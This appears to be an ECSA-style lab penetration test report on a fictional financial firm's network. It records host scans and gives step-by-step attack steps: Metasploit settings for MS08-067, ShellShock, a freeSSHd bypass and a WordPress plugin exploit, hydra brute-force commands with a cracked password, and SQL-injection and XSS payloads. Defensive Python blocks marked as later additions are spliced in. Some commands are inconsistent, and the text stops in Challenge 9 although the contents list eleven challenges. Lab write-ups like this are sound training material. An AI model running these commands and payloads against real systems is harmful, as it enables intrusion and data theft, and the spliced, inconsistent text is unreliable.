Penetration Testing Report

Contents
Document Details
Version History Information
I. Executive Summary
  1.1 Project Scope
  1.2 Project Objectives
  1.3 Testing Methodology
    1.3.1 Planning
    1.3.2 Exploitation
    1.3.3 Reporting
II. Comprehensive Technical Report
  [Challenge 1:] Network Scanning and Service Enumeration
  [Challenge 2:] Penetration Testing Windows - Vulnerability in Server service
  [Challenge 3:] Penetration Testing Ubuntu - Bash Bug vulnerability
  [Challenge 4:] Penetration Testing CentOS - Brute-force SSH Authentication
  [Challenge 5:] Applications Penetration Testing - Vulnerable Application
  [Challenge 6:] Web Application Penetration Testing - www.fnb.com
  [Challenge 7:] Penetration Testing WordPress Site for Plugin Vulnerabilities
  [Challenge 8:] Active Directory Penetration Testing - Brute-Force RDP authentication
  [Challenge 9:] Web Application Penetration Testing - ENTERTAINMENT
  [Challenge 10:] Database Penetration Testing - Brute-Force MySQL authentication
  [Challenge 11:] Penetration Testing Joomla Site for component Vulnerabilities
Document Details

Document Title: Penetration Testing Report
Company:
Recipient: FNB Financial Services
Date:
Classification: Confidential
Document Type: Report
Version: 1.0
Author:
Pen Testers: CEHer/Him
Reviewed By:
Approved By:

Version History Information

Date             Version  Author  Comments
August 16, 2019  v1.0     ECSA    Final Draft

I. Executive Summary
1.1 Project Scope
The assessment performed was focused on FNB Financial Services' internal network and
its related application infrastructure. This report is intended to be an overall assessment of
the FNB Financial Services network and of those systems and subnets that fall within the
scope of this project.
Furthermore, the findings in this report reflect the conditions found during the testing,
and do not necessarily reflect current conditions.
1.2 Project Objectives
Vulnerabilities are scored according to the following scale:

Critical: Intruders can easily gain control of hosts and the network. This needs immediate
attention.
High: Intruders can possibly gain control of the host, or there may be potential leakage of
highly sensitive information. This should be addressed as soon as possible.
Elevated: This could result in potential misuse of the host by intruders. Address this at your
convenience, but do so as soon as possible.
Moderate: Intruders may be able to collect sensitive information from the host, such as the
precise version of software installed. With this information, intruders can easily exploit
known vulnerabilities specific to software versions. Address this the next time you perform
a minor reconfiguration of the host.
Low: Intruders can collect information about the host (open ports, services, etc.) and may
be able to use this information to find other vulnerabilities. Address this the next time you
perform a major reconfiguration of the host.
1.3 Testing Methodology
1.3.1 Planning
During planning, we gather information from the server on which the web application is
installed. Then we detect the path information and identifiable software and determine
their running versions.
1.3.2 Exploitation
Utilizing the information gathered during planning, we look for vulnerabilities in each
piece of software and service that we discovered, and then try to exploit them.
1.3.3 Reporting
Based on the results from the first two steps, we analyze the results. Our risk rating is
based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we write the report on each risk and how to mitigate it.

II. Comprehensive Technical Report
[Challenge 1:] Network Scanning and Service Enumeration
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Once we identified the target system and completed the initial reconnaissance, as discussed
in the step above, we started looking for a mode of entry into the target system. We
conducted network scanning of the IP addresses [ ] authorized for scanning by the organization
from Apr 16 to Apr 20, 2018. The purpose of scanning is to discover exploitable
communication channels, probe as many listeners as possible, and keep track of the ones
that are responsive or useful to an attacker's particular needs. In the scanning phase of an
attack, the attacker tries to find various ways to intrude into a target system. The attacker
also tries to discover more about the target system: which operating system is used, which
services are running, and whether there are any configuration lapses in the target system.
The attacker then forms an attack strategy based on the facts learned during the scan.
Methodology: Our tests were configured not to cause an intentional Denial of Service
condition in a well-maintained network. Most of the scanned IP addresses did not respond
to our scans. This is normal when the IP address is not in use, the host assigned to the IP
address is turned off, or a network protection device such as a firewall prevents scanning
of the host.

Network Hosts: After repeated scanning, primarily with Nmap, and using wildcards (*) for
the subnet and host parts of the IP addresses, we discovered the following live hosts in the
target network.

 #   IP Address     Operating System
 1.  172.19.19.2    Windows 7 Ultimate 7601 SP1
 2.  172.19.19.3    Windows Server 2008 Standard 6001 SP1
 3.  172.19.19.4    Windows Server 2008 Standard 6001 SP1
 4.  172.19.19.5    Linux Ubuntu
 5.  172.19.19.6    Windows Server 2012
 6.  172.19.19.7    Windows Server 2008 Standard 6001 SP1
 7.  172.19.19.8    Windows XP SP3
 8.  172.19.19.9    Windows 8
 9.  172.19.19.10   Windows 7 Ultimate 7601 SP1
10.  10.10.0.2      Windows Server 2008 7601 R2 Enterprise Service Pack 1
11.  10.10.0.3      Windows Server 2008 7601 R2 Enterprise Service Pack 1
12.  172.17.0.2     Windows Server 2008 7601 R2 Enterprise Service Pack 1
13.  172.17.0.3     CentOS 6.4 Final
Table 2.1.1 Live Systems in the Network
After discovering live systems, we started port scanning to find open ports and identify the
services running on these hosts. Port scanning is the process of checking the services
running on the target computer by sending a sequence of messages in an attempt to break
in. In this case, we used nmap on the Kali Linux machine with the command nmap -A <ip>
against each host in Table 2.1.1. The results are listed in Table 2.1.2.

 1. 172.19.19.2 (machine name ACCOUNT)
    Open ports: 21, 45, 80, 135, 139, 445, 3389, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, rdp, http, ssh
 2. 172.19.19.3 (machine name WINULY858KHQIP)
    Open ports: 53, 80, 88, 135, 139, 161, 389, 445, 464, 593, 636, 3268, 3269, 3389,
    5357, 5722, 49152-49158, 49161, 49165, 49167
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, rdp, http, kerberos-sec, ldap,
    ncacn_http, kpasswd5
 3. 172.19.19.4 (machine name ADVERTISEMENT)
    Open ports: 21, 80, 135, 139, 445, 5357, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, http
 4. 172.19.19.5 (machine name Ubuntu)
    Open ports: 80, 5353
    Services: http, mdns
 5. 172.19.19.6 (machine name HRDEPT)
    Open ports: 80, 135, 139, 445, 3306, 5985, 47001, 49152-49157
    Services: msrpc, netbios-ssn, microsoft-ds, http, mysql
 6. 172.19.19.7 (machine name MARKETING)
    Open ports: 21, 80, 135, 139, 445, 5357, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, http
 7. 172.19.19.8 (machine name OPERATIONS)
    Open ports: 21, 135, 139, 445, 3389
    Services: ftp, msrpc, netbios-ssn, rdp
 8. 172.19.19.9 (machine name RDDEPT)
    Open ports: 21, 80, 135, 139, 445, 3306, 3389, 49152-49158
    Services: ftp, msrpc, netbios-ssn, rdp, mysql, http
 9. 172.19.19.10 (machine name SALES)
    Open ports: 21, 80, 135, 139, 445, 3389, 49152-49157
    Services: ftp, msrpc, netbios-ssn, rdp, http
10. 10.10.0.2 (machine name ENTERTAINMENT)
    Open ports: 21, 80, 135, 139, 445, 3389, 47001, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, rdp, http
11. 10.10.0.3 (machine name ECOMM)
    Open ports: 21, 80, 135, 139, 445, 3389, 3306, 47001, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, rdp, http, mysql
12. 172.17.0.2 (machine name WIN-AG46I02)
    Open ports: 21, 80, 135, 139, 445, 3389, 47001, 49152-49157
    Services: ftp, msrpc, netbios-ssn, microsoft-ds, rdp, http
13. 172.17.0.3 (machine name Centos)
    Open ports: 21, 22, 23
    Services: ftp, ssh, telnet
Table 2.1.2 Ports open and Services
Recommendations: We recommend the following measures to limit malicious network scanning
and enumeration:
• Filter inbound ICMP message types at the perimeter.
• Filter all outbound ICMP type 3 "unreachable" messages at the edge routers and
firewalls to prevent UDP port scanning and firewalking from being effective.
• Consider configuring Internet firewalls so they can identify port scans and throttle
the connections accordingly.
• Ensure that your routing and filtering appliances (both routers and firewalls) can't
be bypassed using specific source ports or source routing techniques.
• If you run FTP services, ensure that your firewalls aren't vulnerable to state
circumvention attacks relating to malformed PORT and PASV commands.
Exploitability: There is no exploitability information for this vulnerability.
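As an added defender-side illustration of the recommendation to identify port scans (example code written for this edit, not part of the report), the following Python flags the two scan patterns used in this challenge, many ports on one host and one port swept across a subnet, in constructed iptables-style firewall log lines; the log format, the thresholds and the scanner address are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# iptables-style LOG line (assumed format, constructed for this example)
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+) DPT=(?P<dpt>\d+)"
)


def parse_events(log_text):
    """Turn log lines into (timestamp, src, dst, proto, dport) tuples, oldest first."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events.append((ts, m["src"], m["dst"], m["proto"], int(m["dpt"])))
    events.sort(key=lambda e: e[0])
    return events


def _max_distinct_in_window(timed_keys, window_s):
    """Largest number of distinct keys seen inside any window_s-second span."""
    timed_keys.sort(key=lambda x: x[0])
    counts, best, lo = defaultdict(int), 0, 0
    for t, key in timed_keys:
        counts[key] += 1
        while (t - timed_keys[lo][0]).total_seconds() > window_s:
            old = timed_keys[lo][1]          # slide the window: drop the oldest event
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best


def detect_scans(events, window_s=10, min_ports=8, min_hosts=5):
    """Flag a source that touches many (host, port) pairs or many hosts within the window.
    Returns a list of (src, pattern, count); the thresholds are tuning assumptions."""
    pairs_by_src = defaultdict(list)   # src -> [(ts, (dst, dport))]
    hosts_by_src = defaultdict(list)   # src -> [(ts, dst)]
    for ts, src, dst, _proto, dport in events:
        pairs_by_src[src].append((ts, (dst, dport)))
        hosts_by_src[src].append((ts, dst))
    alerts = []
    for src in pairs_by_src:
        n_pairs = _max_distinct_in_window(pairs_by_src[src], window_s)
        if n_pairs >= min_ports:
            alerts.append((src, "vertical_scan", n_pairs))
        n_hosts = _max_distinct_in_window(hosts_by_src[src], window_s)
        if n_hosts >= min_hosts:
            alerts.append((src, "horizontal_sweep", n_hosts))
    return alerts


def build_sample_log():
    """Constructed log (not from the report): one scanner probing ten ports on 172.19.19.2,
    then sweeping port 445 across the subnet, plus one ordinary web client."""
    fmt = "2018-04-16 10:00:{:02d} fw kernel: FW: IN=eth0 SRC={} DST={} PROTO=TCP DPT={} SYN"
    scanner, victim = "172.19.19.50", "172.19.19.2"
    lines = [fmt.format(i, scanner, victim, p)
             for i, p in enumerate([21, 22, 23, 25, 80, 135, 139, 443, 445, 3389])]
    lines += [fmt.format(20 + i, scanner, f"172.19.19.{i}", 445) for i in range(2, 11)]
    lines += [fmt.format(40 + i, "172.19.19.60", victim, 80) for i in range(3)]
    return "\n".join(lines)


if __name__ == "__main__":
    for alert in detect_scans(parse_events(build_sample_log())):
        print("ALERT src=%s pattern=%s count=%d" % alert)
```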
[Challenge 2:] Penetration Testing Windows - Vulnerability in Server service
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
The vulnerability could allow remote code execution if an affected system received a
specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows
Server 2003 systems, an attacker could exploit this vulnerability without authentication to
run arbitrary code. It is possible that this vulnerability could be used in the crafting of a
wormable exploit.
Exploitation
1. Scanning the Network
Based on the result of Challenge 1, we found a machine named "OPERATION" with IP
address 172.19.19.8. This machine is running the Windows XP Service Pack 3 operating
system. This version of the OS has reached end of life and end of support and has a lot of
vulnerabilities.
2. Scanning for VA
We used Nessus to run a vulnerability assessment (VA) against the "OPERATION" machine
and observed that Nessus detected the machine to be vulnerable to MS08-067. The result
implies that the version of SMB used on the machine is vulnerable, which means we can
perform penetration testing on this vulnerability; it can allow us to run malicious code
without authentication.

3. Exploiting the MS08-067 Vulnerability

We used the Metasploit Framework on the Kali Linux machine to try to exploit this
vulnerability. First, we launched a new command line terminal, typed msfconsole and
pressed Enter. This launches msfconsole.

Next, we typed use exploit/windows/smb/ms08_067_netapi. This loaded the MS08-067
exploit module.

We need to input some information to use this module, such as the target IP and the payload
to be used:
• set RHOSTS 172.19.19.8
• set PAYLOAD windows/meterpreter/bind_tcp

When we hit the run command, it started exploiting the vulnerable service on the
"OPERATION" machine and arbitrary code execution was performed. After a wait of 2-3
minutes, a meterpreter session appeared, indicating successful code execution as shown in
the screenshot.

a. After the exploit, we took the hash value of the file "Employee Insurance Details.xlsx"
as the challenge requested:
First, we searched for a file named "Employee Insurance*".

Next, we downloaded this file to the Kali Linux machine and used the md5sum or sha1sum
command to calculate its hash value.

b. After investigation, we found a hidden message in bullfight-1934.jpg.


Impact: An attacker could exploit this vulnerability without authentication to run
malicious code.
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to take full control of the hosting machine.
Recommendations:
• Apply the vendor patch immediately.
• Block port 445 in the Windows Firewall if it is not used.
[Challenge 3:] Penetration Testing Ubuntu - Bash Bug vulnerability
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: The vulnerability affects Bash, a common component known as a
shell that appears in many versions of Linux and Unix. Bash acts as a command language
interpreter. In other words, it allows the user to type commands into a simple text-based
window, which the operating system will then run. Bash can also be used to run commands
passed to it by applications, and it is this feature that the vulnerability affects. One type
of command that can be sent to Bash allows environment variables to be set. Environment
variables are dynamic, named values that affect the way processes are run on a computer.
The vulnerability lies in the fact that an attacker can tack malicious code onto the
environment variable, which will run once the variable is received.
Exploitation: The most likely route of attack is through web servers utilizing CGI
(Common Gateway Interface), the widely used system for generating dynamic web
content. An attacker can potentially use CGI to send a malformed environment variable to
a vulnerable web server. Because the server uses Bash to interpret the variable, it will also
run any malicious command tacked onto it.
Based on Challenge 1, we found only one machine running the Ubuntu operating system,
with IP address 172.19.19.5 and two open ports:
• 80/tcp/http
• 5353/udp/mdns
On the Kali Linux machine, we used OWASP DirBuster to look for hidden links on this site,
and we found the link /cgi-bin/cinema.

We tried to open this link in a web browser:

We launched a new command line terminal, typed msfconsole and pressed Enter to
launch msfconsole.

In the command line terminal, we selected the module
exploit/multi/http/apache_mod_cgi_bash_env_exec to use the ShellShock exploit module.

We need to input some information to use this module, such as the target IP, the target URI
and the payload to be used, by typing the following commands:
• set RHOSTS 172.19.19.5
• set TARGETURI /cgi-bin/cinema
When all was done, we hit the run command and it started exploiting the vulnerable service.
After a wait of 2-3 minutes, a meterpreter session appeared, indicating successful code
execution as shown in the screenshot.

After the exploit, we took the hash value of the file "Customer Data.xlsx" as the challenge
requested:

Impact: The vulnerability lies in the fact that an attacker can tack malicious code onto the
environment variable, which will run once the variable is received.
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to take full control of the hosting machine.
Recommendations: Update to the latest version of Bash.
[Challenge 4:] Penetration Testing Centos – Brute-force SSH Authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: Brute force attacks on the Secure Shell (SSH) service have been used
to compromise accounts and passwords. With this approach, an automated program tests
combinations of possible usernames and passphrases, one at a time.
Exploitation:

Based on Challenge 1, we found a machine running the CentOS operating system with IP
address 172.17.0.3 and open port 22 for SSH and port 23 for telnet.
We used hydra to brute-force the SSH password in this challenge. First, we launched a new
command line terminal, typed hydra -l root -P
/usr/share/wordlists/metasploit/unix_password.list ssh://172.17.0.3 -t 4 and pressed
Enter. This command means we use hydra to brute-force the root account with the Unix weak
password list.
We found the username and password as shown in the screenshot above.

We logged in to the server and took the hash value as the challenge requested:

Impact: Takeover of server privileges.

Result Analysis: The exploit shows how to brute-force a weak password policy. The system is
using a weak password and allows remote login for the root account.
Recommendations
• Set a stronger password policy:
- Require users to create complex passwords
- Limit the number of times a user can unsuccessfully attempt to log in
- Temporarily lock out users who exceed the specified maximum number of
failed login attempts
• Do not permit the root account to log in to the system remotely.
[Challenge 5:] Applications Penetration Testing – Vulnerable Application.
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: An application vulnerability is a system flaw or weakness in an
application that could be exploited to compromise the security of the application. Once an
attacker has found a flaw, or application vulnerability, and determined how to access it, the
attacker has the potential to exploit the application vulnerability to facilitate a cybercrime.
These crimes target the confidentiality, integrity, or availability (known as the "CIA triad")
of resources possessed by an application, its creators, and its users. Attackers typically rely
on specific tools or methods to perform application vulnerability discovery and
compromise.
Exploitation:
a. We used nmap to discover more about this machine with the command nmap -A 172.19.19.2
-p 1-65000 and found the SSH banner "WeOnlyDo sshd 2.1.3".

We observed that this SSH service is vulnerable: it allows attackers to bypass the
authentication mechanism and gain unauthorized access. We launched a new command line
terminal, typed msfconsole and pressed Enter. This launches msfconsole.

Next, we used the freesshd_authbypass exploit module by typing
"exploit/windows/ssh/freesshd_authbypass" in the msfconsole command line.

Next, we issued the following commands:
• set RHOST 172.19.19.2
• set RPORT 45
• set PAYLOAD windows/meterpreter/bind_tcp

After running the exploit, we had a meterpreter session to control the Accounts machine.

Next, we took the hash value of the file "FNB_Trading_Summary" as the challenge requested:

b. Based on the result of Challenge 1, we know that the machine named "Accounts" has the
Remote Desktop service open. We used hydra to brute-force the username Arnold with the
passwords in the file unix_password.txt at /usr/share/wordlists/metasploit/unix_password.txt
with the command "hydra -l Arnold -P /usr/share/wordlists/metasploit/unix_password.txt
rdp://172.19.19.2 -t 4".

After the attack, we know the password of the username Arnold is "orange".


Impact: Remote attackers can exploit this issue to bypass the authentication mechanism
and gain unauthorized access.
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to take full control of the hosting machine.
Recommendations
• Remove the application or upgrade it to a new version. It requires FreeSSHd > 1.2.6.
• Set a stronger password policy:
- Require users to create complex passwords
- Limit the number of times a user can unsuccessfully attempt to log in
- Temporarily lock out users who exceed the specified maximum number of
failed login attempts
[Challenge 6:] Web Application Penetration Testing – www.fnb.com
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: Database vulnerability assessments are a methodical and proactive
way to deal with database security, reduce the risk associated with both web and
database-specific attacks, and support compliance with relevant standards, laws and
regulations. SQL injection is a type of web application vulnerability where an attacker
can manipulate and submit a SQL command to retrieve database information. This type
of attack mostly occurs when a web application uses user-provided data without
validating or encoding it. It can give the attacker access to sensitive information such as
social security numbers, credit card numbers, or other financial data, and allows an
attacker to create, read, update, alter, or delete data stored in the backend database. It is a
flaw in web applications and not a database or web server issue. Most programmers are
still unaware of this threat. Cross-Site Scripting (XSS) attacks are a type of injection in
which malicious scripts are injected into otherwise benign and trusted web sites. XSS
attacks occur when an attacker uses a web application to send malicious code, generally in
the form of a browser-side script, to a different end user. Flaws that allow these attacks to
succeed are quite widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.

Exploitation:
We used OWASP ZAP to discover vulnerabilities in the website www.fnb.com. As a first
step, we launched a new command line terminal and typed owasp-zap to start OWASP ZAP.

Next, we typed www.fnb.com into the "URL to attack" text box and pressed the Attack
button. After a wait of 2-3 minutes, we knew that this website has an XSS vulnerability and
a Blind SQL Injection vulnerability at Login.aspx with two parameters: txtusername and
txtpwd.

a) Performed Blind SQL Injection Attack
We opened the website in a web browser and logged in with username and password
1' or 1=1 --

b) Performed XSS Attack
We opened the website in a web browser and posted a blog comment containing the string
"<script>alert("XSS")</script>"

Impact: If this vulnerability is successfully exploited, SQL injection can be used to
perform the following types of attacks:
Authentication bypass: Here the attacker could enter the network without providing
any authentic username or password and could gain access to the network. He or
she gets the highest privilege in the network.
Information disclosure: After unauthorized entry into the network, the attacker gets access
to the sensitive data stored in the database.
Compromised data integrity: The attacker changes the main content of the website and also
enters malicious content into it.
Compromised availability of data: The attacker uses this type of attack to delete data
related to audit information or any other crucial database information.
Remote code execution: An attacker could modify, delete, or create data, or even create
new accounts with full user rights on the servers that share files and folders. It allows an
attacker to compromise the host operating system.
Result Analysis: The most common operation in SQL is the query, and it is performed
with the declarative SELECT statement. This SELECT command retrieves data from
one or more tables. SQL queries allow a user to describe or assign the desired data, and
leave the DBMS (Database Management System) responsible for optimizing, planning,
and performing the physical operations. A SQL query includes a list of columns to be
included in the final result after the SELECT keyword. If the information submitted by a
browser to a web application is inserted into a database query without being properly
checked, then there is a chance of SQL injection. An HTML form that receives the
information posted by the user and passes it to an Active Server Pages (ASP) script
running on an IIS web server is the classic example of SQL injection. The information
passed is the username and password. These two data items are checked by querying a
SQL Server database.
Username: 1' or 1=1 -- Password: TESTER
The query executed is:
SELECT Count(*) FROM Users WHERE UserName='1' or 1=1 --' AND Password='TESTER';
This happens because the ASP script builds the query from the user data (username and
password holding the submitted values) with a line of the form:
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";
If the username is a single-quote character (') the effective query becomes:
SELECT * FROM users WHERE username = ''' AND password = '[TESTER]';
This is invalid SQL syntax and produces a SQL Server error message in the user's browser:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password=''. /login.asp, line 16
The quotation mark provided by the user has closed the first one, and the second generates
an error, because it is unclosed. At this point, to customize the behavior of a query, an
attacker can begin injecting strings into it. The text following the double hyphen (--) is a
Transact-SQL comment.

Recommendations
Make no assumptions about the size, type, or content of the data that is received by your
application.
• Test the size and data type of input and enforce appropriate limits to prevent buffer
overruns.
• Test the content of string variables and accept only expected values.
• Reject entries that contain binary data, escape sequences, and comment
characters.
• Never build Transact-SQL statements directly from user input; use stored
procedures to validate user input.
• Implement multiple layers of validation and never concatenate user input that is not
validated.
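The concatenated login query analysed above, placed beside the parameterised form and the input allowlist from the recommendations, as an added Python example that is not from the report. It assumes an in-memory SQLite table in place of the SQL Server Users table, with constructed accounts; the comment and quoting behaviour of the payload is the same.

```python
import re
import sqlite3

# Allowlist for the username field (recommendation: accept only expected values).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def make_db():
    """In-memory stand-in for the Users table queried by the report's ASP login page.
    Assumption: SQLite instead of SQL Server; constructed accounts, plaintext passwords
    only to keep the demonstration short (a real table stores password hashes)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("alice", "S3cret!"), ("bob", "hunter2")])
    return con


def vulnerable_login(con, username, password):
    """Builds the query by string concatenation exactly as the analysed ASP line does.
    Returns True/False from the row count, or the database error text when the SQL
    no longer parses (the '80040e14' unclosed-quotation-mark leak seen in the browser)."""
    query = ("SELECT Count(*) FROM Users WHERE UserName='" + username
             + "' AND Password='" + password + "'")
    try:
        (count,) = con.execute(query).fetchone()
    except sqlite3.OperationalError as err:
        return "error: " + str(err)
    return count > 0


def safe_login(con, username, password):
    """Parameterised query: the driver passes the values as data, so quotes and
    comment markers in the input can never change the SQL statement."""
    query = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    (count,) = con.execute(query, (username, password)).fetchone()
    return count > 0


def validate_username(username):
    """Input-layer check from the recommendations: reject quotes, comment characters
    and anything else outside the expected character set."""
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or 1=1 --"
    print("vulnerable:", vulnerable_login(db, payload, "TESTER"))   # authentication bypass
    print("hardened:  ", safe_login(db, payload, "TESTER"))         # treated as a literal name
    print("quote only:", vulnerable_login(db, "'", "TESTER"))       # error text leaks structure
```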
[Challenge 7:] Penetration Testing WordPress Site for Plugin Vulnerabilities
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: If your WordPress website uses a vulnerable plugin, you're at risk.
Successful exploitation of these bugs could lead to Blind SQL Injection attacks, which
means an attacker could grab sensitive information from your database, including
usernames, (hashed) passwords and, in certain configurations, WordPress Secret Keys
(which could result in a total site takeover). Auditing the security of WordPress and its
plugins will be an important task during your security assessment and pen testing
assignment if your organization uses a WordPress installation.
Enumeration: Based on Challenge 1, we know port 80 is open on the machine named
"HRDEPT". We accessed this machine with a web browser and found a website running
WampServer and WordPress at the address http://172.19.19.6/ECSA.
To attack this machine, we attacked this WordPress site. We used WPScan to detect
vulnerabilities with the command "wpscan -u http://172.19.19.6/ECSA --enumerate vt" and
found that this website is using "inboundio marketing 2.0.3", which has a vulnerability.

Exploitation:
In the scan result, we found that this site is using a plugin named "inboundio marketing 2.0.3"
that has a vulnerability allowing arbitrary file upload and remote code execution. As a proof
of concept, we used Metasploit with the wp_inboundio_marketing_file_upload module.
We opened the terminal on the Kali Linux machine, loaded the Metasploit Framework and
executed the following commands:
• use exploit/windows/wp_inboundio_marketing_file_upload
• set LHOST 172.19.19.6
• set TARGETURI /ECSA
• run
After some time, we had a meterpreter session to control this machine:

After the exploit, we found the file "Employee Details.xlsx" in
"C:\Users\Administrator\Documents" and took the hash value of the file.

Impact: The vulnerability allows arbitrary file upload and remote code execution.
Result Analysis: The above exploit shows that a vulnerable plugin can allow an attacker
to take full control of the hosting machine.
Recommendations: Update or remove this plugin from your WordPress installation.
[Challenge 8:] Active Directory Penetration Testing – Brute-Force RDP
authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: A brute force attack is a trial-and-error method used to obtain
information such as a user password or personal identification number (PIN). In a brute
force attack, automated software is used to generate a large number of consecutive guesses
as to the value of the desired data. SNMP enumeration is the process of using SNMP to
enumerate user accounts on a target system. SNMP employs two major types of software
components for communication: the SNMP agent, which is located on the networking
device, and the SNMP management station, which communicates with the agent.
Enumeration: From Challenge 1, we know which machine is the Active Directory machine
because it is running services like kerberos-sec and ldap. It is the machine named
WINULY858KHQIP with IP address 172.19.19.3.

Exploitation: Based on Challenge 1, the Active Directory machine has port udp/161 open;
this port is used by the SNMP service. We used the snmpcheck command with the default
SNMP community "public" on the Kali Linux machine to find out information about the AD
machine.

We obtained some information about this machine, such as running services, network
configuration, open ports, a list of users and a shared folder named "Public".

Based on the obtained information, we observed that the SMB service can be brute-forced.
On the Kali Linux machine, we used the hydra tool with the unix_password.txt word list to
brute-force this service. To do this, we used the command "hydra -l administrator -P
/usr/share/wordlists/rockyou.taz.gz smb://172.19.19.3 -t 5 -V".

After some time, we found the password of the administrator account.

Next, we opened Remote Desktop and connected to the AD server with the Administrator account.

And we can extract employee data from the Active Directory:
• Anderson M
• Jack M
• Jason A
• John B
• Rebeca D
• Sam C
• Sharon E
Impact: Takeover of Active Directory privileges.
Result Analysis: The exploit shows how to obtain information and brute-force a weak
password policy.
Recommendations:
• Set a stronger password policy:
- Require users to create complex passwords
- Limit the number of times a user can unsuccessfully attempt to log in
- Temporarily lock out users who exceed the specified maximum number of
failed login attempts
• Harden servers/services following best practice.
• For SNMP services: disable the SNMP service or simply remove the SNMP agent; if
disabling SNMP is not possible, change the default "public" community name to
something else.
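The lockout recommendation repeated in Challenges 4, 5 and 8 (limit failed attempts, lock the account out temporarily) as added example code that is not from the report: a failure counter kept per account and per source, replayed against a constructed wordlist the way the hydra runs above would hit it. The thresholds, usernames, source addresses and wordlist are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


class LoginGuard:
    """Failed-attempt counter with temporary lockout, kept per account and per source IP.
    The per-source counter also catches one host trying one password across many accounts."""

    def __init__(self, max_failures=5, window=timedelta(minutes=10), lockout=timedelta(minutes=15)):
        self.max_failures = max_failures     # failures inside `window` that trigger a lockout
        self.window = window
        self.lockout = lockout
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._locked_until = {}              # key -> datetime when the lock expires

    def _is_locked(self, key, now):
        until = self._locked_until.get(key)
        return until is not None and now < until

    def _record_failure(self, key, now):
        q = self._failures[key]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()                      # forget failures older than the window
        if len(q) >= self.max_failures:
            self._locked_until[key] = now + self.lockout
            q.clear()

    def attempt(self, user, source, password_ok, now):
        """Return 'locked', 'denied' or 'ok'. The lock is checked before the password so a
        locked account leaks nothing about whether the guess was correct."""
        acct_key, src_key = ("acct", user), ("src", source)
        if self._is_locked(acct_key, now) or self._is_locked(src_key, now):
            return "locked"
        if password_ok:
            self._failures.pop(acct_key, None)
            return "ok"
        self._record_failure(acct_key, now)
        self._record_failure(src_key, now)
        return "denied"


# Constructed wordlist standing in for the unix_password list used with hydra above.
WORDLIST = ["123456", "password", "root", "toor", "admin", "letmein", "qwerty",
            "welcome", "abc123", "monkey", "dragon", "orange", "master", "shadow"]


def run_wordlist(guard, user, source, wordlist, real_password, start, step=timedelta(seconds=1)):
    """Replay a single-account wordlist attack (hydra -l <user> -P <list>) against the guard.
    Returns (outcome per attempt, index at which the password was accepted or None)."""
    outcomes = []
    for i, guess in enumerate(wordlist):
        result = guard.attempt(user, source, guess == real_password, start + i * step)
        outcomes.append(result)
        if result == "ok":
            return outcomes, i
    return outcomes, None


def run_spray(guard, users, source, start):
    """One wrong guess per account from a single source: no account counter trips,
    but the per-source counter locks the source after max_failures attempts."""
    return [guard.attempt(u, source, False, start + timedelta(seconds=i))
            for i, u in enumerate(users)]


if __name__ == "__main__":
    t0 = datetime(2018, 4, 16, 9, 0, 0)
    print(run_wordlist(LoginGuard(), "root", "172.17.0.99", WORDLIST, "orange", t0))
    print(run_wordlist(LoginGuard(max_failures=10**6), "root", "172.17.0.99", WORDLIST, "orange", t0))
```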
[Challenge 9:] Web Application Penetration Testing – ENTERTAINMENT
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: An application vulnerability is a system flaw or weakness in an
application that could be exploited to compromise the security of the application. Once an
attacker has found a flaw, or application vulnerability, and determined how to access it, the
attacker has the potential to exploit the application vulnerability to facilitate a cybercrime.
These crimes target the confidentiality, integrity, or availability (known as the “CIA triad”)
of resources possessed by an application, its creators, and its users. Attackers typically rely
on specific tools or methods to perform application vulnerability discovery and
compromise.
Exploitation:
We used OWASP ZAP in KaliLinux machine for scanning http://10.10.0.2/moviescope
with options like below and select attack:

36
After OWASP ZAP completed the scan, we found Blind SQL Injection at Login.aspx with
two parameters: txtusername and txtpwd.

We opened the URL http://10.10.0.2/moviescope/login.aspx and tried to log in with the username admin and the password “1’ or 1=1--”.

